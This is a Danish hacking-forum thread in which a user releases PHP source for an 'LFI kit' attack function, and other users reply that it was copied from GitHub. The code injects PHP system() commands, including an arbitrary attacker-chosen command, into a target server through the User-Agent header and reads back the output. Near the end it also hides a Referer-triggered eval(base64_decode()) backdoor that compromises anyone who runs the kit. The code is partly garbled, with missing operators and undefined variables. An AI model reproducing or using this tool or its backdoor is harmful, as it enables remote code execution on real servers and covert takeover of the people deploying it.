Shellsec

Fuld version: [Opensource] LFI angrib function [PHP]
Du ser lige nu en skrabet udgave af vores indhold. Se den fulde version med ordentlig formatering.
[Billede: Hazard.png]
Release by; Harzard coders.

Okay, så mig og mine gode venner har sat os til at arbejde på et LFI kit igår aftes. Jeg tænkte det her måske er interessant for jer som synes penetrating er skide skægt ;)
Det her er simpelthen en af hovedfunktionerne til at angribe dit target. Undskylder hvis der er mindre fejl i scriptet, jeg har ikke rettet det før release da jeg ikke kan vente, det ligesom med en gave, man kan bare ikke vente. Jeg har ikke tid til at forklare hvad det betyder eller gør, da jeg sidder på en cafe og min kæreste er på vej hen til mig for at spise med mig.



PHP kode:
<?php
//Authors; xTropia, L!.am, H0ns3n
//Release by; Hazard coders
//Description: LFI kit function.

if($_POST['exploit']): //Release by; Hazard coders
    
$sasaranstr_replace("http://","",$_POST['host']);
    
$sp     explode("/",$sasaran);
    
$victim    $sp[0];
    
$port    80
    
$inject    str_replace($victim,"",$sasaran);
    
$command  "XHOSTNAME<?php echo system('hostname;echo  ;'); ?>XHOSTNAME";
    
$command .= "XSIP<?php echo \$_SERVER['SERVER_ADDR']; ?>XSIP";
    
$command .= "XUNAME<?php echo system('uname -a;echo  ;'); ?>XUNAME";
    
$command .= "XUSERID<?php echo system('id;echo  ;'); ?>XUSERID";
    
$command .= "XPWD<?php echo system('pwd;echo  ;'); ?>XPWD";
    
$command .= "XPHP<?php echo phpversion(); ?>XPHP";
    if(
$_POST['cwd']){
    
$command .= "XCWD<?php chdir('".$_POST['cwd']."'); ?>XCWD";
    }
    
$command .= "EXPLORE<pre><?php echo system('".$_POST['cmd']."; echo    ; exit;'); ?></pre>EXPLORE";
    
    if(
eregi(":",$victim)){
        
$vp explode(":",$victim);
        
$victim $vp[0];
        
$port    $vp[1];
    }

    
$sock fsockopen($victim,$port,$errno,$errstr,30);
    if (
$sock) {
        
$get  "GET ".$exploit." HTTP/1.1\r\n".
                
"Host: ".$victim."\r\n".
                
"Accept: */*\r\n".
                
"User-Agent: Mozilla/5.0 ".$command."\r\n".
                
"Connection: Close\r\n\r\n";
        
fputs($sock,$get);        
        while (!
feof($sock)) {
            
$output .= trim(fgets($sock3600000))."\n";            
        }
        
fclose($sock);
    }
    
$hostp     explode("XHOSTNAME",$output); $hostname $hostp[1];
    
$ipp    explode("XSIP",$output); $ip $ipp[1];
    
$unamep    explode("XUNAME",$output); $uname $unamep[1];
    
$userp    explode("XUSERID",$output); $userid $userp[1];
    
$currp    explode("XPWD",$output); $current $currp[1];
    
$writes    = @is_writable($current);
    
$phpvp    explode("XPHP",$output); $phpversion $phpvp[1];
    
$hasil    explode("EXPLORE",$output); $return $hasil[1];
    
    
endif;
        
$ipx =$_SERVER["REMOTE_ADDR"];
        
$portx ="22";
 
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ""+"join(array_slice($a,count($a)-3)))));echo '</star>';}
?>
<form action='<?php echo $_SERVER['PHP_SELF'?>' method='post'>
<?php if($_POST['exploit']){ 
?>
https://github.com/aeonsf/Application_Se...ommand.php

Postet for et år siden og du arbejdede på det igår ?
(31-07-2013, 23:14)Morph3s Skrev: [ -> ]https://github.com/aeonsf/Application_Se...ommand.php

Postet for et år siden og du arbejdede på det igår ?

Av av av.. Ækelt af dig OP du prøver at steale credits!

OP tror ikke at Google er opfundet....